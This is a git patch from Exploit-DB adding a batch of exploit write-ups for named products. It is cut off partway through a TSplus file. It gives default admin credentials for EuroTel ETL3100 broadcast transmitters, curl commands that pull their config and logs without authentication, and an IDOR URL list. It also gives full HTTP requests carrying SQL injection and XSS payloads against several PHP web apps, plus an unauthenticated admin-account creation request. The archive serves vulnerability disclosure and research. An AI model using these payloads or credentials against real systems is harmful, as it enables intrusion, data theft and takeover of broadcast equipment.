From e07f33f24da6d847fdd5bba3f24f6f01eeecd446 Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Tue, 22 Aug 2023 00:16:22 +0000
Subject: [PATCH] DB: 2023-08-22

17 changes to exploits/shellcodes/ghdb

EuroTel ETL3100 - Transmitter Authorization Bypass (IDOR)
EuroTel ETL3100 - Transmitter Default Credentials
EuroTel ETL3100 - Transmitter Unauthenticated Config/Log Download

Color Prediction Game v1.0 - SQL Injection

Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated)

Dolibarr Version 17.0.1 - Stored XSS

Global - Multi School Management System Express v1.0- SQL Injection

OVOO Movie Portal CMS v3.3.3 - SQL Injection

PHPJabbers Business Directory Script v3.2 - Multiple Vulnerabilities

Taskhub CRM Tool 2.8.6 - SQL Injection

Inosoft VisiWin 7 2022-2.1 - Insecure Folders Permissions
TSPlus 16.0.0.0 - Remote Work Insecure Credential storage
TSplus 16.0.0.0 - Remote Work Insecure Files and Folders
TSplus 16.0.2.14 - Remote Access Insecure Files and Folders Permissions

Linux/x64 - memfd_create ELF loader Shellcode (170 bytes)
---
 exploits/hardware/remote/51684.txt |  43 +++++++++
 exploits/hardware/remote/51685.txt |  54 +++++++++++
 exploits/hardware/remote/51686.txt |  45 +++++++++
 exploits/php/webapps/51683.txt     |  36 +++++++
 exploits/php/webapps/51687.txt     |  31 ++++++
 exploits/php/webapps/51688.txt     |  19 ++++
 exploits/php/webapps/51689.txt     |  53 +++++++++++
 exploits/php/webapps/51690.txt     |  60 ++++++++++++
 exploits/php/webapps/51691.txt     |  37 ++++++++
 exploits/php/webapps/51692.txt     |  37 ++++++++
 exploits/windows/local/51682.txt   |  42 ++++++++
 exploits/windows/remote/51679.txt  | 101 ++++++++++++++++++++
 exploits/windows/remote/51680.txt  | 103 ++++++++++++++++++++
 exploits/windows/remote/51681.txt  |  45 +++++++++
 files_exploits.csv                 |  14 +++
 files_shellcodes.csv               |   1 +
 shellcodes/linux/51693.asm         | 148 +++++++++++++++++++++++++++++
 17 files changed, 869 insertions(+)
 create mode 100644 exploits/hardware/remote/51684.txt
 create mode 100644 exploits/hardware/remote/51685.txt
 create mode 100644 exploits/hardware/remote/51686.txt
 create mode 100644 exploits/php/webapps/51683.txt
 create mode 100644 exploits/php/webapps/51687.txt
 create mode 100644 exploits/php/webapps/51688.txt
 create mode 100644 exploits/php/webapps/51689.txt
 create mode 100644 exploits/php/webapps/51690.txt
 create mode 100644 exploits/php/webapps/51691.txt
 create mode 100644 exploits/php/webapps/51692.txt
 create mode 100644 exploits/windows/local/51682.txt
 create mode 100644 exploits/windows/remote/51679.txt
 create mode 100644 exploits/windows/remote/51680.txt
 create mode 100644 exploits/windows/remote/51681.txt
 create mode 100644 shellcodes/linux/51693.asm

diff --git a/exploits/hardware/remote/51684.txt b/exploits/hardware/remote/51684.txt
new file mode 100644
index 000000000..b985059ba
--- /dev/null
+++ b/exploits/hardware/remote/51684.txt
@@ -0,0 +1,43 @@
+#Exploit Title: EuroTel ETL3100 Transmitter Default Credentials
+# Exploit Author: LiquidWorm
+Vendor: EuroTel S.p.A. | SIEL, Sistemi Elettronici S.R.L
+Product web page: https://www.eurotel.it | https://www.siel.fm
+Affected version: v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter)
+                  v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter)
+
+
+Summary: RF Technology For Television Broadcasting Applications.
+The Series ETL3100 Radio Transmitter provides all the necessary
+features defined by the FM and DAB standards. Two bands are provided
+to easily complain with analog and digital DAB standard. The Series
+ETL3100 Television Transmitter provides all the necessary features
+defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as
+well as the analog TV standards. Three band are provided to easily
+complain with all standard channels, and switch softly from analog-TV
+'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission.
+
+Desc: The TV and FM transmitter uses a weak set of default administrative
+credentials that can be guessed in remote password attacks and gain full
+control of the system.
+
+Tested on: GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3)
+           lighttpd/1.4.26
+           PHP/5.4.3
+           Xilinx Virtex Machine
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2023-5782
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5782.php
+
+
+29.04.2023
+
+--
+
+
+Using Username "user" and Password "etl3100rt1234" the operator will enter in the WEB interface in a read-only mode.
+Using Username "operator" and Password "2euro21234" the operator will be able also to modify some parameters in the WEB pages.
\ No newline at end of file
diff --git a/exploits/hardware/remote/51685.txt b/exploits/hardware/remote/51685.txt
new file mode 100644
index 000000000..220ae747c
--- /dev/null
+++ b/exploits/hardware/remote/51685.txt
@@ -0,0 +1,54 @@
+# Exploit Title: EuroTel ETL3100 - Transmitter Authorization Bypass (IDOR)
+# Exploit Author: LiquidWorm
+
+Vendor: EuroTel S.p.A. | SIEL, Sistemi Elettronici S.R.L
+Product web page: https://www.eurotel.it | https://www.siel.fm
+Affected version: v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter)
+                  v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter)
+
+
+Summary: RF Technology For Television Broadcasting Applications.
+The Series ETL3100 Radio Transmitter provides all the necessary
+features defined by the FM and DAB standards. Two bands are provided
+to easily complain with analog and digital DAB standard. The Series
+ETL3100 Television Transmitter provides all the necessary features
+defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as
+well as the analog TV standards. Three band are provided to easily
+complain with all standard channels, and switch softly from analog-TV
+'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission.
+
+Desc: The application is vulnerable to insecure direct object references
+that occur when the application provides direct access to objects based
+on user-supplied input. As a result of this vulnerability attackers can
+bypass authorization and access the hidden resources on the system and
+execute privileged functionalities.
+
+Tested on: GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3)
+           lighttpd/1.4.26
+           PHP/5.4.3
+           Xilinx Virtex Machine
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2023-5783
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5783.php
+
+
+29.04.2023
+
+--
+
+
+See URL:
+
+TARGET/exciter.php?page=0
+TARGET/exciter.php?page=1
+TARGET/exciter.php?page=2
+...
+...
+TARGET/exciter.php?page=29
+TARGET/exciter.php?page=30
+TARGET/exciter.php?page=31
\ No newline at end of file
diff --git a/exploits/hardware/remote/51686.txt b/exploits/hardware/remote/51686.txt
new file mode 100644
index 000000000..1d161c7b6
--- /dev/null
+++ b/exploits/hardware/remote/51686.txt
@@ -0,0 +1,45 @@
+# Exploit Title: EuroTel ETL3100 - Transmitter Unauthenticated Config/Log Download
+# Exploit Author: LiquidWorm
+
+Vendor: EuroTel S.p.A. | SIEL, Sistemi Elettronici S.R.L
+Product web page: https://www.eurotel.it | https://www.siel.fm
+Affected version: v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter)
+                  v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter)
+
+
+Summary: RF Technology For Television Broadcasting Applications.
+The Series ETL3100 Radio Transmitter provides all the necessary
+features defined by the FM and DAB standards. Two bands are provided
+to easily complain with analog and digital DAB standard. The Series
+ETL3100 Television Transmitter provides all the necessary features
+defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as
+well as the analog TV standards. Three band are provided to easily
+complain with all standard channels, and switch softly from analog-TV
+'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission.
+
+Desc: The TV and FM transmitter suffers from an unauthenticated
+configuration and log download vulnerability. This will enable
+the attacker to disclose sensitive information and help him in
+authentication bypass, privilege escalation and full system access.
+
+Tested on: GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3)
+           lighttpd/1.4.26
+           PHP/5.4.3
+           Xilinx Virtex Machine
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2023-5784
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5784.php
+
+
+29.04.2023
+
+--
+
+
+$ curl http://192.168.2.166/cfg_download.php -o config.tgz
+$ curl http://192.168.2.166/exciter/log_download.php -o log.tar.gz
\ No newline at end of file
diff --git a/exploits/php/webapps/51683.txt b/exploits/php/webapps/51683.txt
new file mode 100644
index 000000000..daf87b94a
--- /dev/null
+++ b/exploits/php/webapps/51683.txt
@@ -0,0 +1,36 @@
+# Exploit Title: Dolibarr Version 17.0.1 - Stored XSS
+# Dork:
+# Date: 2023-08-09
+# Exploit Author: Furkan Karaarslan
+# Category : Webapps
+# Vendor Homepage: http://127.0.0.1/dolibarr-17.0.1/htdocs/user/note.php
+# Version: 17.0.1 (REQUIRED)
+# Tested on: Windows/Linux
+# CVE :
+
+-----------------------------------------------------------------------------
+Requests
+
+POST /dolibarr-17.0.1/htdocs/user/note.php HTTP/1.1
+Host: 127.0.0.1
+Content-Length: 599
+Cache-Control: max-age=0
+sec-ch-ua:
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: ""
+Upgrade-Insecure-Requests: 1
+Origin: http://127.0.0.1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://127.0.0.1/dolibarr-17.0.1/htdocs/user/note.php?action=editnote_public&token=4b1479ad024e82d298b395bfab9b1916&id=1
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: 5c8ccd93504819395bd9eb83add769eb=g6sujc3ss8cj53cvk84qv0jgol; f758a1cd0925196cd7746824e3df122b=u04rsmdqgrdpr2kduo49gl0rmh; DOLSESSID_18109f368bbc82f2433d1d6c639db71bb97e2bd1=sud22bsu9sbqqc4bgcloki2eht
+Connection: close
+
+token=4b1479ad024e82d298b395bfab9b1916&action=setnote_public&token=4b1479ad024e82d298b395bfab9b1916&id=1&note_public=%3Ca+onscrollend%3Dalert%281%29+style%3D%22display%3Ablock%3Boverflow%3Aauto%3Bborder%3A1px+dashed%3Bwidth%3A500px%3Bheight%3A100px%3B%22%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cspan+id%3Dx%3Etest%3C%2Fspan%3E%3C%2Fa%3E&modify=De%C4%9Fi%C5%9Ftir
\ No newline at end of file
diff --git a/exploits/php/webapps/51687.txt b/exploits/php/webapps/51687.txt
new file mode 100644
index 000000000..fc0c1fede
--- /dev/null
+++ b/exploits/php/webapps/51687.txt
@@ -0,0 +1,31 @@
+# Exploit Title: PHPJabbers Business Directory Script v3.2 - Multiple Vulnerabilities
+# Date: 09/08/2023
+# Exploit Author: Kerimcan Ozturk
+# Vendor Homepage: https://www.phpjabbers.com/
+# Software Link: https://www.phpjabbers.com/business-directory-script/
+# Version: 3.2
+# Tested on: Windows 10 Pro
+## Description
+
+Technical Detail / POC
+==========================
+Login Account
+Go to Property Page (
+https://website/index.php?controller=pjAdminListings&action=pjActionUpdate)
+Edit Any Property (
+https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57
+)
+
+[1] Cross-Site Scripting (XSS)
+
+Request:
+https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id=
+"<script><image/src/onerror=prompt(8)>
+
+[2] Cross-Site Request Forgery
+
+Request:
+https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id=
+"<script><font%20color="green">Kerimcan%20Ozturk</font>
+
+Best Regards
\ No newline at end of file
diff --git a/exploits/php/webapps/51688.txt b/exploits/php/webapps/51688.txt
new file mode 100644
index 000000000..af724604c
--- /dev/null
+++ b/exploits/php/webapps/51688.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated)
+# Date: 11.08.2023
+# Exploit Author: 0xBr
+# Software Link: https://codecanyon.net/item/crypto-currency-tracker-prices-charts-news-icos-info-and-more/21588008
+# Version: <=9.5
+# CVE: CVE-2023-37759
+
+POST /en/user/register HTTP/2
+Host: localhost
+Cookie: XSRF-TOKEN=[TOKEN]; laravel_session=[LARAVEL_SESSION]; SELECTED_CURRENCY=USD; SELECTED_CURRENCY_PRICE=1; cookieconsent_status=dismiss
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 756
+
+_token=[_TOKEN]&name=testing&role_id=1&email=testing%40testing.testing&password=testing&g-recaptcha-response=[G-RECAPTCHA-RESPONSE]&submit_register=Register
+
+-- Sent with https://mailfence.com  Secure and private email
\ No newline at end of file
diff --git a/exploits/php/webapps/51689.txt b/exploits/php/webapps/51689.txt
new file mode 100644
index 000000000..a0bbf3bf5
--- /dev/null
+++ b/exploits/php/webapps/51689.txt
@@ -0,0 +1,53 @@
+# Exploit Title: Color Prediction Game v1.0 - SQL Injection
+# Date: 2023-08-12
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://www.codester.com/items/44411/color-prediction-game-php-script
+# Tested on: Kali Linux & MacOS
+# CVE: N/A
+
+### Request ###
+
+POST /loginNow.php HTTP/1.1
+Host: localhost
+Cookie: PHPSESSID=250594265b833a4d3a7adf6e1c136fe2
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)
+Gecko/20100101 Firefox/116.0
+Accept: */*
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data;
+boundary=---------------------------395879129218961020344050490865
+Content-Length: 434
+Origin: http://localhost
+Referer: http://localhost/login.php
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+Te: trailers
+Connection: close
+-----------------------------395879129218961020344050490865
+Content-Disposition: form-data; name="login_mobile"
+4334343433
+-----------------------------395879129218961020344050490865
+Content-Disposition: form-data; name="login_password"
+123456
+-----------------------------395879129218961020344050490865
+Content-Disposition: form-data; name="action"
+login
+-----------------------------395879129218961020344050490865--
+
+### Parameter & Payloads ###
+Parameter: MULTIPART login_mobile ((custom) POST)
+Type: time-based blind
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+Payload: -----------------------------395879129218961020344050490865
+Content-Disposition: form-data; name="login_mobile"
+4334343433' AND (SELECT 4472 FROM (SELECT(SLEEP(5)))UADa) AND 'PDLW'='PDLW
+-----------------------------395879129218961020344050490865
+Content-Disposition: form-data; name="login_password"
+123456
+-----------------------------395879129218961020344050490865
+Content-Disposition: form-data; name="action"
+login
+-----------------------------395879129218961020344050490865--
\ No newline at end of file
diff --git a/exploits/php/webapps/51690.txt b/exploits/php/webapps/51690.txt
new file mode 100644
index 000000000..9af1c6d3d
--- /dev/null
+++ b/exploits/php/webapps/51690.txt
@@ -0,0 +1,60 @@
+# Exploit Title:  Global - Multi School Management System Express v1.0- SQL Injection
+# Date: 2023-08-12
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://codecanyon.net/item/global-multi-school-management-system-express/21975378
+# Tested on: Kali Linux & MacOS
+# CVE: N/A
+
+### Request ###
+POST /report/balance HTTP/1.1
+Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
+Accept: */*
+X-Requested-With: XMLHttpRequest
+Referer: http://localhost
+Cookie: gmsms=b8d36491f08934ac621b6bc7170eaef18290469f
+Content-Length: 472
+Accept-Encoding: gzip,deflate,br
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
+Host: localhost
+Connection: Keep-alive
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="school_id"
+0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="academic_year_id"
+
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="group_by"
+
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="date_from"
+
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="date_to"
+
+------------YWJkMTQzNDcw--
+
+### Parameter & Payloads ###
+Parameter: MULTIPART school_id ((custom) POST)
+Type: error-based
+Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY
+clause (EXTRACTVALUE)
+Payload: ------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="school_id"
+0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z' AND
+EXTRACTVALUE(1586,CONCAT(0x5c,0x71766b6b71,(SELECT
+(ELT(1586=1586,1))),0x716a627071)) AND 'Dyjx'='Dyjx
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="academic_year_id"
+
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="group_by"
+
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="date_from"
+
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="date_to"
+
+------------YWJkMTQzNDcw–
\ No newline at end of file
diff --git a/exploits/php/webapps/51691.txt b/exploits/php/webapps/51691.txt
new file mode 100644
index 000000000..79916f4b6
--- /dev/null
+++ b/exploits/php/webapps/51691.txt
@@ -0,0 +1,37 @@
+# Exploit Title: OVOO Movie Portal CMS v3.3.3 - SQL Injection
+# Date: 2023-08-12
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://codecanyon.net/item/ovoomovie-video-streaming-cms-with-unlimited-tvseries/20180569
+# Tested on: Kali Linux & MacOS
+# CVE: N/A
+
+### Request ###
+POST /filter_movies/1 HTTP/2
+Host: localhost
+Cookie: ci_session=tiic5hcli8v3qkg1chgj0dqpou9495us
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)
+Gecko/20100101 Firefox/116.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/movies.html
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 60
+Origin: htts://localhost
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+Te: trailers
+action=fetch_data&minimum_rating=1&maximum_rating=6.8&page=1
+
+### Parameter & Payloads ###
+Parameter: maximum_rating (POST)
+Type: boolean-based blind
+Title: AND boolean-based blind - WHERE or HAVING clause
+Payload: action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND
+2238=2238&page=1
+Type: time-based blind
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+Payload: action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND (SELECT
+4101 FROM (SELECT(SLEEP(5)))FLwc)&page=1
\ No newline at end of file
diff --git a/exploits/php/webapps/51692.txt b/exploits/php/webapps/51692.txt
new file mode 100644
index 000000000..76a7a53dd
--- /dev/null
+++ b/exploits/php/webapps/51692.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Taskhub CRM Tool 2.8.6 - SQL Injection
+# Date: 2023-08-12
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor:
+https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874
+# Tested on: Kali Linux & MacOS
+# CVE: N/A
+
+### Request ###
+GET /projects?filter=notstarted HTTP/1.1
+Host: localhost
+Cookie: csrf_cookie_name=a3e6a7d379a3e5f160d72c182ff8a8c8;
+ci_session=tgu03eoatvsonh7v986g1vj57b8sufh9
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)
+Gecko/20100101 Firefox/116.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+### Parameter & Payloads ###
+Parameter: filter (GET)
+Type: boolean-based blind
+Title: AND boolean-based blind - WHERE or HAVING clause
+Payload: filter=notstarted' AND 2978=2978 AND 'vMQO'='vMQO
+Type: error-based
+Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY
+clause (EXTRACTVALUE)
+Payload: filter=notstarted' AND
+EXTRACTVALUE(5313,CONCAT(0x5c,0x716a707a71,(SELECT
+(ELT(5313=5313,1))),0x71787a6b71)) AND 'ronQ'='ronQ
\ No newline at end of file
diff --git a/exploits/windows/local/51682.txt b/exploits/windows/local/51682.txt
new file mode 100644
index 000000000..105c6f554
--- /dev/null
+++ b/exploits/windows/local/51682.txt
@@ -0,0 +1,42 @@
+# Exploit Title: Inosoft VisiWin 7 2022-2.1 - Insecure Folders Permissions
+Privilege Escalation
+# Date: 2023-08-09
+# Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia
+# Vendor Homepage: https://www.inosoft.com/
+# Version: Up to 2022-2.1 (Runtime RT7.3 RC3 20221209.5)
+# Tested on: Windows
+# CVE: CVE-2023-31468
+
+Inosoft VisiWin is a completely open system with a configurable range of
+functions. It combines all features of classic HMI software with
+unlimited programming possibilities.
+The installation of the solution will create insecure folder, and this
+could allow a malicious user to manipulate file content or change
+legitimate files (e.g., VisiWin7.Server.Manager.exe which runs with
+SYSTEM privileges) to compromise a system or to gain elevated
+privileges.
+
+This is the list of insecure files and folders with their respective
+permissions:
+
+C:\>icacls "C:\Program Files (x86)\INOSOFT GmbH"
+C:\Program Files (x86)\INOSOFT GmbH BUILTIN\Administrators:(OI)(CI)(F)
+                                     Everyone:(OI)(CI)(F)
+                                     NT AUTHORITY\SYSTEM:(OI)(CI)(F)
+
+Successfully processed 1 files; Failed processing 0 files
+
+C:\>
+
+--------------------------------------------------------------------------------------------------------------------------------------------------------
+
+C:\>icacls "C:\Program Files (x86)\INOSOFT GmbH\VisiWin7\Runtime\VisiWin7.Server.Manager.exe"
+C:\Program Files (x86)\INOSOFT GmbH\VisiWin 7\Runtime\VisiWin7.Server.Manager.exe BUILTIN\Administrators:(I)(F)
+
+          Everyone:(I)(F)
+
+          NT AUTHORITY\SYSTEM:(I)(F)
+
+Successfully processed 1 files; Failed processing 0 files
+
+C:\>
\ No newline at end of file
diff --git a/exploits/windows/remote/51679.txt b/exploits/windows/remote/51679.txt
new file mode 100644
index 000000000..4a700ec79
--- /dev/null
+++ b/exploits/windows/remote/51679.txt
@@ -0,0 +1,101 @@
+# Exploit Title: TSplus 16.0.2.14 - Remote Access Insecure Files and Folders Permissions
+# Date: 2023-08-09
+# Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia
+# Vendor Homepage: https://tsplus.net/
+# Version: Up to 16.0.2.14
+# Tested on: Windows
+# CVE : CVE-2023-31067
+
+TSplus Remote Access (v. 16.0.2.14) is an alternative to Citrix and
+Microsoft RDS for remote desktop access and Windows application
+delivery. Web-enable your legacy apps, create SaaS solutions or remotely
+access your centralized corporate tools and files.
+The TSplus Remote Access solution comes with an embedded web server to
+allow remote users to easely connect remotely.
+However, insecure file and folder permissions are set and this could
+allow a malicious user to manipulate file content (e.g.: changing the
+code of html pages or js scripts) or change legitimate files (e.g.
+Setup-VirtualPrinter-Client.exe) in order to compromise a system or to
+gain elevated privileges.
+
+This is the list of insecure files and folders with their respective
+permissions:
+Everyone:(OI)(CF)(F) and Everyone(F)
+Permission: Everyone:(OI)(CI)(F)
+
+C:\Program Files (x86)\TSplus\Clients\www
+C:\Program Files (x86)\TSplus\Clients\www\addons
+C:\Program Files (x86)\TSplus\Clients\www\ConnectionClient
+C:\Program Files (x86)\TSplus\Clients\www\downloads
+C:\Program Files (x86)\TSplus\Clients\www\prints
+C:\Program Files (x86)\TSplus\Clients\www\RemoteAppClient
+C:\Program Files (x86)\TSplus\Clients\www\software
+C:\Program Files (x86)\TSplus\Clients\www\var
+C:\Program Files (x86)\TSplus\Clients\www\cgi-bin\remoteapp
+C:\Program Files (x86)\TSplus\Clients\www\downloads\shared
+C:\Program Files (x86)\TSplus\Clients\www\software\java
+C:\Program Files (x86)\TSplus\Clients\www\software\js
+C:\Program Files (x86)\TSplus\Clients\www\software\html5\jwres
+C:\Program Files (x86)\TSplus\Clients\www\software\html5\locales
+C:\Program Files (x86)\TSplus\Clients\www\software\html5\imgs\topmenu
+C:\Program Files (x86)\TSplus\Clients\www\software\html5\imgs\key\parts
+C:\Program Files (x86)\TSplus\Clients\www\software\java\img
+C:\Program Files (x86)\TSplus\Clients\www\software\java\third
+C:\Program Files (x86)\TSplus\Clients\www\software\java\img\cp
+C:\Program Files (x86)\TSplus\Clients\www\software\java\img\srv
+C:\Program Files (x86)\TSplus\Clients\www\software\java\third\images
+C:\Program Files (x86)\TSplus\Clients\www\software\java\third\js
+C:\Program Files
+(x86)\TSplus\Clients\www\software\java\third\images\bramus
+C:\Program Files
+(x86)\TSplus\Clients\www\software\java\third\js\prototype
+C:\Program Files (x86)\TSplus\Clients\www\var\log
+C:\Program Files (x86)\TSplus\UserDesktop\themes
+C:\Program Files (x86)\TSplus\UserDesktop\themes\BlueBar
+C:\Program Files (x86)\TSplus\UserDesktop\themes\Default
+C:\Program Files (x86)\TSplus\UserDesktop\themes\GreyBar
+C:\Program Files (x86)\TSplus\UserDesktop\themes\Logon
+C:\Program Files (x86)\TSplus\UserDesktop\themes\MenuOnTop
+C:\Program Files (x86)\TSplus\UserDesktop\themes\Seamless
+C:\Program Files (x86)\TSplus\UserDesktop\themes\ThinClient
+C:\Program Files (x86)\TSplus\UserDesktop\themes\Vista
+
+------------------------------------------------------------------------------
+
+Permission: Everyone:(F)
+
+C:\Program Files (x86)\TSplus\Clients\www\all.min.css
+C:\Program Files (x86)\TSplus\Clients\www\custom.css
+C:\Program Files (x86)\TSplus\Clients\www\popins.css
+C:\Program Files (x86)\TSplus\Clients\www\robots.txt
+C:\Program Files
+(x86)\TSplus\Clients\www\addons\Setup-VirtualPrinter-Client.exe
+C:\Program Files (x86)\TSplus\Clients\www\cgi-bin\hb.exe.config
+C:\Program Files
+(x86)\TSplus\Clients\www\cgi-bin\SessionPrelaunch.Common.dll.config
+C:\Program Files (x86)\TSplus\Clients\www\cgi-bin\remoteapp\index.html
+C:\Program Files (x86)\TSplus\Clients\www\RemoteAppClient\index.html
+C:\Program Files (x86)\TSplus\Clients\www\software\common.css
+C:\Program Files
+(x86)\TSplus\Clients\www\software\html5\jwres\jwwebsockify.jar
+C:\Program Files (x86)\TSplus\Clients\www\software\html5\jwres\web.jar
+C:\Program Files
+(x86)\TSplus\Clients\www\software\html5\own\exitlist.html
+C:\Program Files
+(x86)\TSplus\Clients\www\software\html5\own\exitupload.html
+C:\Program Files
+(x86)\TSplus\Clients\www\software\html5\own\getlist.html
+C:\Program Files
+(x86)\TSplus\Clients\www\software\html5\own\getupload.html
+C:\Program Files
+(x86)\TSplus\Clients\www\software\html5\own\postupload.html
+C:\Program Files
+(x86)\TSplus\Clients\www\software\html5\own\uploaderr.html
+C:\Program Files (x86)\TSplus\Clients\www\software\java\index.html
+C:\Program Files (x86)\TSplus\Clients\www\software\java\img\index.html
+C:\Program Files (x86)\TSplus\Clients\www\software\java\img\port.bin
+C:\Program Files (x86)\TSplus\Clients\www\software\java\third\jws.js
+C:\Program Files (x86)\TSplus\Clients\www\software\java\third\sha256.js
+C:\Program Files
+(x86)\TSplus\Clients\www\software\java\third\js\prototype\prototype.js
+C:\Program Files (x86)\TSplus\Clients\www\software\js\jquery.min.js
\ No newline at end of file
diff --git a/exploits/windows/remote/51680.txt b/exploits/windows/remote/51680.txt
new file mode 100644
index 000000000..b83e9a1fd
--- /dev/null
+++ b/exploits/windows/remote/51680.txt
@@ -0,0 +1,103 @@
+# Exploit Title: TSplus 16.0.0.0 - Remote Work Insecure Files and Folders Permissions
+# Date: 2023-08-09
+# Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia
+# Vendor Homepage: https://tsplus.net/
+# Version: Up to 16.0.0.0
+# Tested on: Windows
+# CVE : CVE-2023-31068
+
+With TSPlus Remote Work (v. 16.0.0.0) you can create a secure single
+sign-on web portal and remote desktop gateway that enables users to
+remotely access the console session of their office PC.
+The solution comes with an embedded web server to allow remote users to
+easely connect remotely.
